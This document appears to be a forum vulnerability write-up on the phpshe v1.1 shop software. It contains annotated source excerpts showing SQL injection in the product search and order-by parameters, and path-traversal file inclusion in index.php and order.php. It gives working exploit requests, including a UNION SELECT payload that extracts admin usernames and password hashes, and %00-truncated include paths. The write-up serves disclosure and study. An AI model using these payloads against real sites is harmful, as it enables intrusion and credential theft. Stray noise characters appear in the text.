
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By     : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体参数传输概览（请求参数如何进入变量）
// common.php: every request superglobal is exploded into local variables by
// extract() with a per-source prefix: $_g_* = GET, $_p_* = POST,
// $_s_* = SESSION, $_c_* = COOKIE. The only processing visible here is
// pe_trim() / pe_stripslashes() (definitions not shown); no SQL or path
// escaping happens at this point, so any $_g_*/$_p_*/$_c_* value that is later
// interpolated into a query or an include() path is attacker-controlled.
if (get_magic_quotes_gpc()) {
    // With magic_quotes_gpc on, pe_stripslashes() presumably removes the slashes
    // PHP added, so the extracted values are the raw request bytes in both branches.
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
// SESSION and COOKIE are extracted after GET/POST. EXTR_PREFIX_ALL keeps the
// four namespaces apart, but a cookie named e.g. "cart_list" still becomes
// $_c_cart_list and is consumed unserialized by index.php (see below).
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
8 U1 g5 ?# B3 [
0x01 包含漏洞（index.php，$mod 可控）

// index.php (front controller)
<?php
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
// $cache_setting is not defined in this excerpt; presumably set by common.php.
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// NOTE(review): $_c_cart_list is the raw "cart_list" cookie (see the COOKIE
// extract in common.php), so this is unserialize() on attacker-controlled
// data — a PHP object-injection sink. Whether it is exploitable depends on
// which classes with __wakeup/__destruct are loaded at this point (not shown).
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// $module is the constant 'index' (common.php), but $mod is taken verbatim from
// $_POST['mod'] / $_GET['mod'] with no whitelist, so "../" sequences walk out of
// module/index/. The author calls this a low-value ("鸡肋") inclusion: the
// attacker can only include files that already exist on the host, and dropping
// the ".php" suffix needs the %00 truncation, which only works on PHP < 5.3.4.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
// common.php, from line 15: URL routing.
$module = $mod = $act = 'index';
// mod/act/id are read straight from $_POST/$_GET, not from the extracted
// $_p_*/$_g_* copies, so they bypass pe_trim()/pe_stripslashes() and are never
// checked against the set of existing modules/actions. $mod is interpolated
// into an include() path by index.php.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// Unlike $module/$mod/$act, $id has no default assignment visible in this excerpt.
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
// exp: http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
// The trailing %00 truncates the ".php" suffix appended by index.php. This
// requires PHP < 5.3.4 and, because $_GET['mod'] is used raw here (no
// stripslashes), magic_quotes_gpc = Off — with it On the NUL arrives as "\0"
// and the truncation fails. The target file must already exist on disk.


0x02 搜索注入（product.php，keyword / orderby 未过滤）

// product.php, action "list" (the enclosing switch is outside this excerpt)
case 'list':
    // $id is cast with intval(), so the category filter itself is safe.
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // Search: $sqlwhere is a raw SQL fragment built by string concatenation and
    // handed to pe_selectall() unchanged (see the method below).
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // NOTE(review): "where .=" is almost certainly "$sqlwhere .=" with the
        // "$sql" lost when the post was copied; kept verbatim here.
        where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // SQL injection #1: $_g_keyword is $_GET['keyword'] after pe_trim() only
    // (common.php); it is interpolated into the LIKE pattern with no escaping.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    if ($_g_orderby) {
        // SQL injection #2: $_g_orderby is split on "_" and both halves are
        // appended verbatim. $orderby[1] sits outside the backticks, so whatever
        // follows the first "_" becomes free-form SQL after "order by".
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // $_g_page reaches the LIMIT clause via sql_selectall() (not shown); whether
    // it is cast there is not visible in this excerpt.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // Hot-selling ranking
    $product_hotlist = product_hotlist();
    // Current breadcrumb path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库6 ^* Z% x: c, ~9 j! E- w
/**
 * Select all rows from the `dbpre.$table` table.
 *
 * $where is either an array (converted to a condition by $this->_dowhere(),
 * which is not shown) or a pre-built SQL fragment. The caller above passes a
 * string concatenated from request parameters, and nothing in this method
 * escapes it: $field, $table and the result of _dowhere() are interpolated
 * directly into the query text. Presumably _dowhere() returns a string
 * argument unchanged (prefixed with "where 1" or similar, since the fragments
 * above all start with " and"), which is why the injection below works.
 * $limit_page is array(per_page, page) forwarded to sql_selectall().
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // Build the condition clause.
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp（union 的列数须与 product 表列数一致，此处为 19；pe_ 为默认表前缀，即 dbpre 常量）
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

0x03 包含漏洞 2（order.php，info[order_payway] 可控）

// order.php, action "pay" (the enclosing switch is outside this excerpt)
case 'pay':
    // pe_dbhold() is presumably a DB-escaping helper (not shown).
    $order_id = pe_dbhold($_g_id);
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // unserialize() here consumes admin-managed cache data, not request input.
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // '\n' is single-quoted: newlines are replaced by a literal backslash-n.
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    // The order is looked up by id and state only; no check that it belongs to
    // the current user is visible in this excerpt, so any visitor who knows an
    // unpaid order id reaches the code below.
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // NOTE(review): $_p_info is the whole POST "info[...]" array, written to
        // the order row as-is. Which columns this can overwrite depends on how
        // pe_update() builds its SET clause (not shown) — worth checking as a
        // mass-assignment issue beyond the inclusion the author reports.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // File inclusion #2: $_p_info['order_payway'] is attacker-controlled and
            // never checked against $cache_payway. "../" walks out of payway/, and the
            // %00 in the exploit truncates the "/order_pay.php" suffix — that part only
            // works on PHP < 5.3.4. Because POST went through pe_stripslashes() when
            // magic quotes are on (common.php), the NUL survives in either setting.
            // pe_update() must succeed first, and the included file must already
            // exist on the host — hence "low-value" inclusion, unless a file the
            // attacker controls (e.g. an upload) is reachable.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;

}

//exp:
//GET  http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
//POST info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98
//注：id 须为状态为 notpay 的真实订单号；%00 截断仅在 PHP < 5.3.4 下有效；被包含的 1.txt 须已存在于服务器上（需结合上传等手段落地文件才能 Getshell）
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
